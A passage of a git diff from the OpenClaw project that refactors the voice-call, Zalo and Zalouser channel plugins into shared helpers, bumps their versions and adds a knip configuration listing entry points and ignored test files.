provider: "ngrok", allowNgrokFreeTierLoopbackBypass: false }, - webhookSecurity: { - allowedHosts: [], - trustForwardingHeaders: false, - trustedProxyIPs: [], - }, - streaming: { - enabled: false, - sttProvider: "openai-realtime", - sttModel: "gpt-4o-transcribe", - silenceDurationMs: 800, - vadThreshold: 0.5, - streamPath: "/voice/stream", - preStartTimeoutMs: 5000, - maxPendingConnections: 32, - maxPendingConnectionsPerIp: 4, - maxConnections: 128, - }, - skipSignatureVerification: false, - stt: { provider: "openai", model: "whisper-1" }, - tts: { - provider: "openai", - openai: { model: "gpt-4o-mini-tts", voice: "coral" }, - }, - responseModel: "openai/gpt-4o-mini", - responseTimeoutMs: 30000, - }; + return createVoiceCallBaseConfig({ tunnelProvider: "ngrok" }); } describe("createVoiceCallRuntime lifecycle", () => { diff --git a/extensions/voice-call/src/test-fixtures.ts b/extensions/voice-call/src/test-fixtures.ts new file mode 100644 index 00000000000..594aa064ba5 --- /dev/null +++ b/extensions/voice-call/src/test-fixtures.ts @@ -0,0 +1,52 @@ +import type { VoiceCallConfig } from "./config.js"; + +export function createVoiceCallBaseConfig(params?: { + provider?: "telnyx" | "twilio" | "plivo" | "mock"; + tunnelProvider?: "none" | "ngrok"; +}): VoiceCallConfig { + return { + enabled: true, + provider: params?.provider ?? "mock", + fromNumber: "+15550001234", + inboundPolicy: "disabled", + allowFrom: [], + outbound: { defaultMode: "notify", notifyHangupDelaySec: 3 }, + maxDurationSeconds: 300, + staleCallReaperSeconds: 600, + silenceTimeoutMs: 800, + transcriptTimeoutMs: 180000, + ringTimeoutMs: 30000, + maxConcurrentCalls: 1, + serve: { port: 3334, bind: "127.0.0.1", path: "/voice/webhook" }, + tailscale: { mode: "off", path: "/voice/webhook" }, + tunnel: { + provider: params?.tunnelProvider ?? "none", + allowNgrokFreeTierLoopbackBypass: false, + }, + webhookSecurity: { + allowedHosts: [], + trustForwardingHeaders: false, + trustedProxyIPs: [], + }, + streaming: { + enabled: false, + sttProvider: "openai-realtime", + sttModel: "gpt-4o-transcribe", + silenceDurationMs: 800, + vadThreshold: 0.5, + streamPath: "/voice/stream", + preStartTimeoutMs: 5000, + maxPendingConnections: 32, + maxPendingConnectionsPerIp: 4, + maxConnections: 128, + }, + skipSignatureVerification: false, + stt: { provider: "openai", model: "whisper-1" }, + tts: { + provider: "openai", + openai: { model: "gpt-4o-mini-tts", voice: "coral" }, + }, + responseModel: "openai/gpt-4o-mini", + responseTimeoutMs: 30000, + }; +} diff --git a/extensions/whatsapp/package.json b/extensions/whatsapp/package.json index a408bcb609f..bbd34a9322e 100644 --- a/extensions/whatsapp/package.json +++ b/extensions/whatsapp/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/whatsapp", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw WhatsApp channel plugin", "type": "module", diff --git a/extensions/zalo/CHANGELOG.md b/extensions/zalo/CHANGELOG.md index 317ba4abe08..5b8d7d249cf 100644 --- a/extensions/zalo/CHANGELOG.md +++ b/extensions/zalo/CHANGELOG.md @@ -1,5 +1,11 @@ # Changelog +## 2026.3.7 + +### Changes + +- Version alignment with core OpenClaw release numbers. + ## 2026.3.3 ### Changes diff --git a/extensions/zalo/package.json b/extensions/zalo/package.json index 2eec4dbc233..24cc10afcf7 100644 --- a/extensions/zalo/package.json +++ b/extensions/zalo/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/zalo", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Zalo channel plugin", "type": "module", "dependencies": { diff --git a/extensions/zalo/src/channel.ts b/extensions/zalo/src/channel.ts index a3233ce5228..b6a7f7d0486 100644 --- a/extensions/zalo/src/channel.ts +++ b/extensions/zalo/src/channel.ts @@ -6,8 +6,10 @@ import type { } from "openclaw/plugin-sdk/zalo"; import { applyAccountNameToChannelSection, + buildBaseAccountStatusSnapshot, buildChannelConfigSchema, buildTokenChannelStatusSummary, + buildChannelSendResult, DEFAULT_ACCOUNT_ID, deleteAccountFromConfigSection, chunkTextForOutbound, @@ -15,10 +17,13 @@ import { formatPairingApproveHint, migrateBaseNameToDefaultAccount, normalizeAccountId, + isNumericTargetId, PAIRING_APPROVED_MESSAGE, + resolveOutboundMediaUrls, resolveDefaultGroupPolicy, resolveOpenProviderRuntimeGroupPolicy, resolveChannelAccountConfigBasePath, + sendPayloadWithChunkedTextAndMedia, setAccountEnabledInConfigSection, } from "openclaw/plugin-sdk/zalo"; import { @@ -182,13 +187,7 @@ export const zaloPlugin: ChannelPlugin = { messaging: { normalizeTarget: normalizeZaloMessagingTarget, targetResolver: { - looksLikeId: (raw) => { - const trimmed = raw.trim(); - if (!trimmed) { - return false; - } - return /^\d{3,}$/.test(trimmed); - }, + looksLikeId: isNumericTargetId, hint: "", }, }, @@ -303,51 +302,21 @@ export const zaloPlugin: ChannelPlugin = { chunker: chunkTextForOutbound, chunkerMode: "text", textChunkLimit: 2000, - sendPayload: async (ctx) => { - const text = ctx.payload.text ?? ""; - const urls = ctx.payload.mediaUrls?.length - ? ctx.payload.mediaUrls - : ctx.payload.mediaUrl - ? [ctx.payload.mediaUrl] - : []; - if (!text && urls.length === 0) { - return { channel: "zalo", messageId: "" }; - } - if (urls.length > 0) { - let lastResult = await zaloPlugin.outbound!.sendMedia!({ - ...ctx, - text, - mediaUrl: urls[0], - }); - for (let i = 1; i < urls.length; i++) { - lastResult = await zaloPlugin.outbound!.sendMedia!({ - ...ctx, - text: "", - mediaUrl: urls[i], - }); - } - return lastResult; - } - const outbound = zaloPlugin.outbound!; - const limit = outbound.textChunkLimit; - const chunks = limit && outbound.chunker ? outbound.chunker(text, limit) : [text]; - let lastResult: Awaited>>; - for (const chunk of chunks) { - lastResult = await outbound.sendText!({ ...ctx, text: chunk }); - } - return lastResult!; - }, + sendPayload: async (ctx) => + await sendPayloadWithChunkedTextAndMedia({ + ctx, + textChunkLimit: zaloPlugin.outbound!.textChunkLimit, + chunker: zaloPlugin.outbound!.chunker, + sendText: (nextCtx) => zaloPlugin.outbound!.sendText!(nextCtx), + sendMedia: (nextCtx) => zaloPlugin.outbound!.sendMedia!(nextCtx), + emptyResult: { channel: "zalo", messageId: "" }, + }), sendText: async ({ to, text, accountId, cfg }) => { const result = await sendMessageZalo(to, text, { accountId: accountId ?? undefined, cfg: cfg, }); - return { - channel: "zalo", - ok: result.ok, - messageId: result.messageId ?? "", - error: result.error ? new Error(result.error) : undefined, - }; + return buildChannelSendResult("zalo", result); }, sendMedia: async ({ to, text, mediaUrl, accountId, cfg }) => { const result = await sendMessageZalo(to, text, { @@ -355,12 +324,7 @@ export const zaloPlugin: ChannelPlugin = { mediaUrl, cfg: cfg, }); - return { - channel: "zalo", - ok: result.ok, - messageId: result.messageId ?? "", - error: result.error ? new Error(result.error) : undefined, - }; + return buildChannelSendResult("zalo", result); }, }, status: { @@ -377,19 +341,19 @@ export const zaloPlugin: ChannelPlugin = { probeZalo(account.token, timeoutMs, resolveZaloProxyFetch(account.config.proxy)), buildAccountSnapshot: ({ account, runtime }) => { const configured = Boolean(account.token?.trim()); + const base = buildBaseAccountStatusSnapshot({ + account: { + accountId: account.accountId, + name: account.name, + enabled: account.enabled, + configured, + }, + runtime, + }); return { - accountId: account.accountId, - name: account.name, - enabled: account.enabled, - configured, + ...base, tokenSource: account.tokenSource, - running: runtime?.running ?? false, - lastStartAt: runtime?.lastStartAt ?? null, - lastStopAt: runtime?.lastStopAt ?? null, - lastError: runtime?.lastError ?? null, mode: account.config.webhookUrl ? "webhook" : "polling", - lastInboundAt: runtime?.lastInboundAt ?? null, - lastOutboundAt: runtime?.lastOutboundAt ?? null, dmPolicy: account.config.dmPolicy ?? "pairing", }; }, diff --git a/extensions/zalo/src/monitor.webhook.test.ts b/extensions/zalo/src/monitor.webhook.test.ts index 8cdecd0560c..297d8249d3a 100644 --- a/extensions/zalo/src/monitor.webhook.test.ts +++ b/extensions/zalo/src/monitor.webhook.test.ts @@ -94,6 +94,33 @@ function createPairingAuthCore(params?: { storeAllowFrom?: string[]; pairingCrea return { core, readAllowFromStore, upsertPairingRequest }; } +async function postUntilRateLimited(params: { + baseUrl: string; + path: string; + secret: string; + withNonceQuery?: boolean; + attempts?: number; +}): Promise { + const attempts = params.attempts ?? 130; + for (let i = 0; i < attempts; i += 1) { + const url = params.withNonceQuery + ? `${params.baseUrl}${params.path}?nonce=${i}` + : `${params.baseUrl}${params.path}`; + const response = await fetch(url, { + method: "POST", + headers: { + "x-bot-api-secret-token": params.secret, + "content-type": "application/json", + }, + body: "{}", + }); + if (response.status === 429) { + return true; + } + } + return false; +} + describe("handleZaloWebhookRequest", () => { afterEach(() => { clearZaloWebhookSecurityStateForTest(); @@ -239,21 +266,11 @@ describe("handleZaloWebhookRequest", () => { try { await withServer(webhookRequestHandler, async (baseUrl) => { - let saw429 = false; - for (let i = 0; i < 130; i += 1) { - const response = await fetch(`${baseUrl}/hook-rate`, { - method: "POST", - headers: { - "x-bot-api-secret-token": "secret", - "content-type": "application/json", - }, - body: "{}", - }); - if (response.status === 429) { - saw429 = true; - break; - } - } + const saw429 = await postUntilRateLimited({ + baseUrl, + path: "/hook-rate", + secret: "secret", // pragma: allowlist secret + }); expect(saw429).toBe(true); }); @@ -270,7 +287,7 @@ describe("handleZaloWebhookRequest", () => { const response = await fetch(`${baseUrl}/hook-query-status?nonce=${i}`, { method: "POST", headers: { - "x-bot-api-secret-token": "invalid-token", + "x-bot-api-secret-token": "invalid-token", // pragma: allowlist secret "content-type": "application/json", }, body: "{}", @@ -290,21 +307,12 @@ describe("handleZaloWebhookRequest", () => { try { await withServer(webhookRequestHandler, async (baseUrl) => { - let saw429 = false; - for (let i = 0; i < 130; i += 1) { - const response = await fetch(`${baseUrl}/hook-query-rate?nonce=${i}`, { - method: "POST", - headers: { - "x-bot-api-secret-token": "secret", - "content-type": "application/json", - }, - body: "{}", - }); - if (response.status === 429) { - saw429 = true; - break; - } - } + const saw429 = await postUntilRateLimited({ + baseUrl, + path: "/hook-query-rate", + secret: "secret", // pragma: allowlist secret + withNonceQuery: true, + }); expect(saw429).toBe(true); expect(getZaloWebhookRateLimitStateSizeForTest()).toBe(1); diff --git a/extensions/zalo/src/send.ts b/extensions/zalo/src/send.ts index c58142f8633..44f1549067a 100644 --- a/extensions/zalo/src/send.ts +++ b/extensions/zalo/src/send.ts @@ -40,37 +40,47 @@ function resolveSendContext(options: ZaloSendOptions): { return { token, fetcher: resolveZaloProxyFetch(proxy) }; } +function resolveValidatedSendContext( + chatId: string, + options: ZaloSendOptions, +): { ok: true; chatId: string; token: string; fetcher?: ZaloFetch } | { ok: false; error: string } { + const { token, fetcher } = resolveSendContext(options); + if (!token) { + return { ok: false, error: "No Zalo bot token configured" }; + } + const trimmedChatId = chatId?.trim(); + if (!trimmedChatId) { + return { ok: false, error: "No chat_id provided" }; + } + return { ok: true, chatId: trimmedChatId, token, fetcher }; +} + export async function sendMessageZalo( chatId: string, text: string, options: ZaloSendOptions = {}, ): Promise { - const { token, fetcher } = resolveSendContext(options); - - if (!token) { - return { ok: false, error: "No Zalo bot token configured" }; - } - - if (!chatId?.trim()) { - return { ok: false, error: "No chat_id provided" }; + const context = resolveValidatedSendContext(chatId, options); + if (!context.ok) { + return { ok: false, error: context.error }; } if (options.mediaUrl) { - return sendPhotoZalo(chatId, options.mediaUrl, { + return sendPhotoZalo(context.chatId, options.mediaUrl, { ...options, - token, + token: context.token, caption: text || options.caption, }); } try { const response = await sendMessage( - token, + context.token, { - chat_id: chatId.trim(), + chat_id: context.chatId, text: text.slice(0, 2000), }, - fetcher, + context.fetcher, ); if (response.ok && response.result) { @@ -88,14 +98,9 @@ export async function sendPhotoZalo( photoUrl: string, options: ZaloSendOptions = {}, ): Promise { - const { token, fetcher } = resolveSendContext(options); - - if (!token) { - return { ok: false, error: "No Zalo bot token configured" }; - } - - if (!chatId?.trim()) { - return { ok: false, error: "No chat_id provided" }; + const context = resolveValidatedSendContext(chatId, options); + if (!context.ok) { + return { ok: false, error: context.error }; } if (!photoUrl?.trim()) { @@ -104,13 +109,13 @@ export async function sendPhotoZalo( try { const response = await sendPhoto( - token, + context.token, { - chat_id: chatId.trim(), + chat_id: context.chatId, photo: photoUrl.trim(), caption: options.caption?.slice(0, 2000), }, - fetcher, + context.fetcher, ); if (response.ok && response.result) { diff --git a/extensions/zalo/src/token.ts b/extensions/zalo/src/token.ts index 2d9496fa5c2..00ed1d720f7 100644 --- a/extensions/zalo/src/token.ts +++ b/extensions/zalo/src/token.ts @@ -8,6 +8,19 @@ export type ZaloTokenResolution = BaseTokenResolution & { source: "env" | "config" | "configFile" | "none"; }; +function readTokenFromFile(tokenFile: string | undefined): string { + const trimmedPath = tokenFile?.trim(); + if (!trimmedPath) { + return ""; + } + try { + return readFileSync(trimmedPath, "utf8").trim(); + } catch { + // ignore read failures + return ""; + } +} + export function resolveZaloToken( config: ZaloConfig | undefined, accountId?: string | null, @@ -44,28 +57,16 @@ export function resolveZaloToken( if (token) { return { token, source: "config" }; } - const tokenFile = accountConfig.tokenFile?.trim(); - if (tokenFile) { - try { - const fileToken = readFileSync(tokenFile, "utf8").trim(); - if (fileToken) { - return { token: fileToken, source: "configFile" }; - } - } catch { - // ignore read failures - } + const fileToken = readTokenFromFile(accountConfig.tokenFile); + if (fileToken) { + return { token: fileToken, source: "configFile" }; } } - const accountTokenFile = accountConfig?.tokenFile?.trim(); - if (!accountHasBotToken && accountTokenFile) { - try { - const fileToken = readFileSync(accountTokenFile, "utf8").trim(); - if (fileToken) { - return { token: fileToken, source: "configFile" }; - } - } catch { - // ignore read failures + if (!accountHasBotToken) { + const fileToken = readTokenFromFile(accountConfig?.tokenFile); + if (fileToken) { + return { token: fileToken, source: "configFile" }; } } @@ -79,16 +80,9 @@ export function resolveZaloToken( if (token) { return { token, source: "config" }; } - const tokenFile = baseConfig?.tokenFile?.trim(); - if (tokenFile) { - try { - const fileToken = readFileSync(tokenFile, "utf8").trim(); - if (fileToken) { - return { token: fileToken, source: "configFile" }; - } - } catch { - // ignore read failures - } + const fileToken = readTokenFromFile(baseConfig?.tokenFile); + if (fileToken) { + return { token: fileToken, source: "configFile" }; } } diff --git a/extensions/zalouser/CHANGELOG.md b/extensions/zalouser/CHANGELOG.md index c2603a0973e..4680f5131af 100644 --- a/extensions/zalouser/CHANGELOG.md +++ b/extensions/zalouser/CHANGELOG.md @@ -1,5 +1,11 @@ # Changelog +## 2026.3.7 + +### Changes + +- Version alignment with core OpenClaw release numbers. + ## 2026.3.3 ### Changes diff --git a/extensions/zalouser/package.json b/extensions/zalouser/package.json index 85e66a73021..581cf4ce8ca 100644 --- a/extensions/zalouser/package.json +++ b/extensions/zalouser/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/zalouser", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Zalo Personal Account plugin via native zca-js integration", "type": "module", "dependencies": { diff --git a/extensions/zalouser/src/channel.ts b/extensions/zalouser/src/channel.ts index 2c2228b05b9..41327f1fe7e 100644 --- a/extensions/zalouser/src/channel.ts +++ b/extensions/zalouser/src/channel.ts @@ -1,5 +1,3 @@ -import fsp from "node:fs/promises"; -import path from "node:path"; import type { ChannelAccountSnapshot, ChannelDirectoryEntry, @@ -12,16 +10,19 @@ import type { } from "openclaw/plugin-sdk/zalouser"; import { applyAccountNameToChannelSection, + buildChannelSendResult, + buildBaseAccountStatusSnapshot, buildChannelConfigSchema, DEFAULT_ACCOUNT_ID, chunkTextForOutbound, deleteAccountFromConfigSection, formatAllowFromLowercase, formatPairingApproveHint, + isNumericTargetId, migrateBaseNameToDefaultAccount, normalizeAccountId, - resolvePreferredOpenClawTmpDir, resolveChannelAccountConfigBasePath, + sendPayloadWithChunkedTextAndMedia, setAccountEnabledInConfigSection, } from "openclaw/plugin-sdk/zalouser"; import { @@ -37,6 +38,7 @@ import { buildZalouserGroupCandidates, findZalouserGroupEntry } from "./group-po import { resolveZalouserReactionMessageIds } from "./message-sid.js"; import { zalouserOnboardingAdapter } from "./onboarding.js"; import { probeZalouser } from "./probe.js"; +import { writeQrDataUrlToTempFile } from "./qr-temp-file.js"; import { sendMessageZalouser, sendReactionZalouser } from "./send.js"; import { collectZalouserStatusIssues } from "./status-issues.js"; import { @@ -69,25 +71,6 @@ function resolveZalouserQrProfile(accountId?: string | null): string { return normalized; } -async function writeQrDataUrlToTempFile( - qrDataUrl: string, - profile: string, -): Promise { - const trimmed = qrDataUrl.trim(); - const match = trimmed.match(/^data:image\/png;base64,(.+)$/i); - const base64 = (match?.[1] ?? "").trim(); - if (!base64) { - return null; - } - const safeProfile = profile.replace(/[^a-zA-Z0-9_-]+/g, "-") || "default"; - const filePath = path.join( - resolvePreferredOpenClawTmpDir(), - `openclaw-zalouser-qr-${safeProfile}.png`, - ); - await fsp.writeFile(filePath, Buffer.from(base64, "base64")); - return filePath; -} - function mapUser(params: { id: string; name?: string | null; @@ -116,39 +99,30 @@ function mapGroup(params: { }; } +function resolveZalouserGroupPolicyEntry(params: ChannelGroupContext) { + const account = resolveZalouserAccountSync({ + cfg: params.cfg, + accountId: params.accountId ?? undefined, + }); + const groups = account.config.groups ?? {}; + return findZalouserGroupEntry( + groups, + buildZalouserGroupCandidates({ + groupId: params.groupId, + groupChannel: params.groupChannel, + includeWildcard: true, + }), + ); +} + function resolveZalouserGroupToolPolicy( params: ChannelGroupContext, ): GroupToolPolicyConfig | undefined { - const account = resolveZalouserAccountSync({ - cfg: params.cfg, - accountId: params.accountId ?? undefined, - }); - const groups = account.config.groups ?? {}; - const entry = findZalouserGroupEntry( - groups, - buildZalouserGroupCandidates({ - groupId: params.groupId, - groupChannel: params.groupChannel, - includeWildcard: true, - }), - ); - return entry?.tools; + return resolveZalouserGroupPolicyEntry(params)?.tools; } function resolveZalouserRequireMention(params: ChannelGroupContext): boolean { - const account = resolveZalouserAccountSync({ - cfg: params.cfg, - accountId: params.accountId ?? undefined, - }); - const groups = account.config.groups ?? {}; - const entry = findZalouserGroupEntry( - groups, - buildZalouserGroupCandidates({ - groupId: params.groupId, - groupChannel: params.groupChannel, - includeWildcard: true, - }), - ); + const entry = resolveZalouserGroupPolicyEntry(params); if (typeof entry?.requireMention === "boolean") { return entry.requireMention; } @@ -395,13 +369,7 @@ export const zalouserPlugin: ChannelPlugin = { return trimmed.replace(/^(zalouser|zlu):/i, ""); }, targetResolver: { - looksLikeId: (raw) => { - const trimmed = raw.trim(); - if (!trimmed) { - return false; - } - return /^\d{3,}$/.test(trimmed); - }, + looksLikeId: isNumericTargetId, hint: "", }, }, @@ -560,49 +528,19 @@ export const zalouserPlugin: ChannelPlugin = { chunker: chunkTextForOutbound, chunkerMode: "text", textChunkLimit: 2000, - sendPayload: async (ctx) => { - const text = ctx.payload.text ?? ""; - const urls = ctx.payload.mediaUrls?.length - ? ctx.payload.mediaUrls - : ctx.payload.mediaUrl - ? [ctx.payload.mediaUrl] - : []; - if (!text && urls.length === 0) { - return { channel: "zalouser", messageId: "" }; - } - if (urls.length > 0) { - let lastResult = await zalouserPlugin.outbound!.sendMedia!({ - ...ctx, - text, - mediaUrl: urls[0], - }); - for (let i = 1; i < urls.length; i++) { - lastResult = await zalouserPlugin.outbound!.sendMedia!({ - ...ctx, - text: "", - mediaUrl: urls[i], - }); - } - return lastResult; - } - const outbound = zalouserPlugin.outbound!; - const limit = outbound.textChunkLimit; - const chunks = limit && outbound.chunker ? outbound.chunker(text, limit) : [text]; - let lastResult: Awaited>>; - for (const chunk of chunks) { - lastResult = await outbound.sendText!({ ...ctx, text: chunk }); - } - return lastResult!; - }, + sendPayload: async (ctx) => + await sendPayloadWithChunkedTextAndMedia({ + ctx, + textChunkLimit: zalouserPlugin.outbound!.textChunkLimit, + chunker: zalouserPlugin.outbound!.chunker, + sendText: (nextCtx) => zalouserPlugin.outbound!.sendText!(nextCtx), + sendMedia: (nextCtx) => zalouserPlugin.outbound!.sendMedia!(nextCtx), + emptyResult: { channel: "zalouser", messageId: "" }, + }), sendText: async ({ to, text, accountId, cfg }) => { const account = resolveZalouserAccountSync({ cfg: cfg, accountId }); const result = await sendMessageZalouser(to, text, { profile: account.profile }); - return { - channel: "zalouser", - ok: result.ok, - messageId: result.messageId ?? "", - error: result.error ? new Error(result.error) : undefined, - }; + return buildChannelSendResult("zalouser", result); }, sendMedia: async ({ to, text, mediaUrl, accountId, cfg, mediaLocalRoots }) => { const account = resolveZalouserAccountSync({ cfg: cfg, accountId }); @@ -611,12 +549,7 @@ export const zalouserPlugin: ChannelPlugin = { mediaUrl, mediaLocalRoots, }); - return { - channel: "zalouser", - ok: result.ok, - messageId: result.messageId ?? "", - error: result.error ? new Error(result.error) : undefined, - }; + return buildChannelSendResult("zalouser", result); }, }, status: { @@ -641,17 +574,19 @@ export const zalouserPlugin: ChannelPlugin = { buildAccountSnapshot: async ({ account, runtime }) => { const configured = await checkZcaAuthenticated(account.profile); const configError = "not authenticated"; + const base = buildBaseAccountStatusSnapshot({ + account: { + accountId: account.accountId, + name: account.name, + enabled: account.enabled, + configured, + }, + runtime: configured + ? runtime + : { ...runtime, lastError: runtime?.lastError ?? configError }, + }); return { - accountId: account.accountId, - name: account.name, - enabled: account.enabled, - configured, - running: runtime?.running ?? false, - lastStartAt: runtime?.lastStartAt ?? null, - lastStopAt: runtime?.lastStopAt ?? null, - lastError: configured ? (runtime?.lastError ?? null) : (runtime?.lastError ?? configError), - lastInboundAt: runtime?.lastInboundAt ?? null, - lastOutboundAt: runtime?.lastOutboundAt ?? null, + ...base, dmPolicy: account.config.dmPolicy ?? "pairing", }; }, diff --git a/extensions/zalouser/src/monitor.account-scope.test.ts b/extensions/zalouser/src/monitor.account-scope.test.ts index 931a6cde6eb..919bd25887c 100644 --- a/extensions/zalouser/src/monitor.account-scope.test.ts +++ b/extensions/zalouser/src/monitor.account-scope.test.ts @@ -1,21 +1,11 @@ import type { OpenClawConfig, PluginRuntime, RuntimeEnv } from "openclaw/plugin-sdk/zalouser"; import { describe, expect, it, vi } from "vitest"; +import "./monitor.send-mocks.js"; import { __testing } from "./monitor.js"; +import { sendMessageZalouserMock } from "./monitor.send-mocks.js"; import { setZalouserRuntime } from "./runtime.js"; import type { ResolvedZalouserAccount, ZaloInboundMessage } from "./types.js"; -const sendMessageZalouserMock = vi.hoisted(() => vi.fn(async () => {})); -const sendTypingZalouserMock = vi.hoisted(() => vi.fn(async () => {})); -const sendDeliveredZalouserMock = vi.hoisted(() => vi.fn(async () => {})); -const sendSeenZalouserMock = vi.hoisted(() => vi.fn(async () => {})); - -vi.mock("./send.js", () => ({ - sendMessageZalouser: sendMessageZalouserMock, - sendTypingZalouser: sendTypingZalouserMock, - sendDeliveredZalouser: sendDeliveredZalouserMock, - sendSeenZalouser: sendSeenZalouserMock, -})); - describe("zalouser monitor pairing account scoping", () => { it("scopes DM pairing-store reads and pairing requests to accountId", async () => { const readAllowFromStore = vi.fn( diff --git a/extensions/zalouser/src/monitor.group-gating.test.ts b/extensions/zalouser/src/monitor.group-gating.test.ts index dda0ed0a3de..7e11680b315 100644 --- a/extensions/zalouser/src/monitor.group-gating.test.ts +++ b/extensions/zalouser/src/monitor.group-gating.test.ts @@ -1,21 +1,16 @@ import type { OpenClawConfig, PluginRuntime, RuntimeEnv } from "openclaw/plugin-sdk/zalouser"; import { beforeEach, describe, expect, it, vi } from "vitest"; +import "./monitor.send-mocks.js"; import { __testing } from "./monitor.js"; +import { + sendDeliveredZalouserMock, + sendMessageZalouserMock, + sendSeenZalouserMock, + sendTypingZalouserMock, +} from "./monitor.send-mocks.js"; import { setZalouserRuntime } from "./runtime.js"; import type { ResolvedZalouserAccount, ZaloInboundMessage } from "./types.js"; -const sendMessageZalouserMock = vi.hoisted(() => vi.fn(async () => {})); -const sendTypingZalouserMock = vi.hoisted(() => vi.fn(async () => {})); -const sendDeliveredZalouserMock = vi.hoisted(() => vi.fn(async () => {})); -const sendSeenZalouserMock = vi.hoisted(() => vi.fn(async () => {})); - -vi.mock("./send.js", () => ({ - sendMessageZalouser: sendMessageZalouserMock, - sendTypingZalouser: sendTypingZalouserMock, - sendDeliveredZalouser: sendDeliveredZalouserMock, - sendSeenZalouser: sendSeenZalouserMock, -})); - function createAccount(): ResolvedZalouserAccount { return { accountId: "default", diff --git a/extensions/zalouser/src/monitor.send-mocks.ts b/extensions/zalouser/src/monitor.send-mocks.ts new file mode 100644 index 00000000000..9e576f5e830 --- /dev/null +++ b/extensions/zalouser/src/monitor.send-mocks.ts @@ -0,0 +1,20 @@ +import { vi } from "vitest"; + +const sendMocks = vi.hoisted(() => ({ + sendMessageZalouserMock: vi.fn(async () => {}), + sendTypingZalouserMock: vi.fn(async () => {}), + sendDeliveredZalouserMock: vi.fn(async () => {}), + sendSeenZalouserMock: vi.fn(async () => {}), +})); + +export const sendMessageZalouserMock = sendMocks.sendMessageZalouserMock; +export const sendTypingZalouserMock = sendMocks.sendTypingZalouserMock; +export const sendDeliveredZalouserMock = sendMocks.sendDeliveredZalouserMock; +export const sendSeenZalouserMock = sendMocks.sendSeenZalouserMock; + +vi.mock("./send.js", () => ({ + sendMessageZalouser: sendMessageZalouserMock, + sendTypingZalouser: sendTypingZalouserMock, + sendDeliveredZalouser: sendDeliveredZalouserMock, + sendSeenZalouser: sendSeenZalouserMock, +})); diff --git a/extensions/zalouser/src/qr-temp-file.ts b/extensions/zalouser/src/qr-temp-file.ts new file mode 100644 index 00000000000..07babfcc731 --- /dev/null +++ b/extensions/zalouser/src/qr-temp-file.ts @@ -0,0 +1,22 @@ +import fsp from "node:fs/promises"; +import path from "node:path"; +import { resolvePreferredOpenClawTmpDir } from "openclaw/plugin-sdk/zalouser"; + +export async function writeQrDataUrlToTempFile( + qrDataUrl: string, + profile: string, +): Promise { + const trimmed = qrDataUrl.trim(); + const match = trimmed.match(/^data:image\/png;base64,(.+)$/i); + const base64 = (match?.[1] ?? "").trim(); + if (!base64) { + return null; + } + const safeProfile = profile.replace(/[^a-zA-Z0-9_-]+/g, "-") || "default"; + const filePath = path.join( + resolvePreferredOpenClawTmpDir(), + `openclaw-zalouser-qr-${safeProfile}.png`, + ); + await fsp.writeFile(filePath, Buffer.from(base64, "base64")); + return filePath; +} diff --git a/extensions/zalouser/src/zca-client.ts b/extensions/zalouser/src/zca-client.ts index 94e291b710f..605b07522d6 100644 --- a/extensions/zalouser/src/zca-client.ts +++ b/extensions/zalouser/src/zca-client.ts @@ -126,6 +126,20 @@ export type Listener = { stop(): void; }; +type DeliveryEventMessage = { + msgId: string; + cliMsgId: string; + uidFrom: string; + idTo: string; + msgType: string; + st: number; + at: number; + cmd: number; + ts: string | number; +}; + +type DeliveryEventMessages = DeliveryEventMessage | DeliveryEventMessage[]; + export type API = { listener: Listener; getContext(): { @@ -185,57 +199,10 @@ export type API = { ): Promise; sendDeliveredEvent( isSeen: boolean, - messages: - | { - msgId: string; - cliMsgId: string; - uidFrom: string; - idTo: string; - msgType: string; - st: number; - at: number; - cmd: number; - ts: string | number; - } - | Array<{ - msgId: string; - cliMsgId: string; - uidFrom: string; - idTo: string; - msgType: string; - st: number; - at: number; - cmd: number; - ts: string | number; - }>, - type?: number, - ): Promise; - sendSeenEvent( - messages: - | { - msgId: string; - cliMsgId: string; - uidFrom: string; - idTo: string; - msgType: string; - st: number; - at: number; - cmd: number; - ts: string | number; - } - | Array<{ - msgId: string; - cliMsgId: string; - uidFrom: string; - idTo: string; - msgType: string; - st: number; - at: number; - cmd: number; - ts: string | number; - }>, + messages: DeliveryEventMessages, type?: number, ): Promise; + sendSeenEvent(messages: DeliveryEventMessages, type?: number): Promise; }; type ZaloCtor = new (options?: { logging?: boolean; selfListen?: boolean }) => { diff --git a/knip.config.ts b/knip.config.ts new file mode 100644 index 00000000000..e4daabd7e95 --- /dev/null +++ b/knip.config.ts @@ -0,0 +1,105 @@ +const rootEntries = [ + "openclaw.mjs!", + "src/index.ts!", + "src/entry.ts!", + "src/cli/daemon-cli.ts!", + "src/extensionAPI.ts!", + "src/infra/warning-filter.ts!", + "src/channels/plugins/agent-tools/whatsapp-login.ts!", + "src/channels/plugins/actions/discord.ts!", + "src/channels/plugins/actions/signal.ts!", + "src/channels/plugins/actions/telegram.ts!", + "src/telegram/audit.ts!", + "src/telegram/token.ts!", + "src/line/accounts.ts!", + "src/line/send.ts!", + "src/line/template-messages.ts!", + "src/hooks/bundled/*/handler.ts!", + "src/hooks/llm-slug-generator.ts!", + "src/plugin-sdk/*.ts!", +] as const; + +const config = { + ignoreFiles: [ + "scripts/**", + "**/__tests__/**", + "src/test-utils/**", + "**/test-helpers/**", + "**/test-fixtures/**", + "**/live-*.ts", + "**/test-*.ts", + "**/*test-helpers.ts", + "**/*test-fixtures.ts", + "**/*test-harness.ts", + "**/*test-utils.ts", + "**/*mocks.ts", + "**/*.e2e-mocks.ts", + "**/*.e2e-*.ts", + "**/*.harness.ts", + "**/*.job-fixtures.ts", + "**/*.mock-harness.ts", + "**/*.suite-helpers.ts", + "**/*.test-setup.ts", + "**/job-fixtures.ts", + "**/*test-mocks.ts", + "**/*test-runtime*.ts", + "**/*.mock-setup.ts", + "**/*.cases.ts", + "**/*.e2e-harness.ts", + "**/*.fixture.ts", + "**/*.fixtures.ts", + "**/*.mocks.ts", + "**/*.mocks.shared.ts", + "**/*.shared-test.ts", + "**/*.suite.ts", + "**/*.test-runtime.ts", + "**/*.testkit.ts", + "**/*.test-fixtures.ts", + "**/*.test-harness.ts", + "**/*.test-helper.ts", + "**/*.test-helpers.ts", + "**/*.test-mocks.ts", + "**/*.test-utils.ts", + "src/gateway/live-image-probe.ts", + "src/secrets/credential-matrix.ts", + "src/agents/claude-cli-runner.ts", 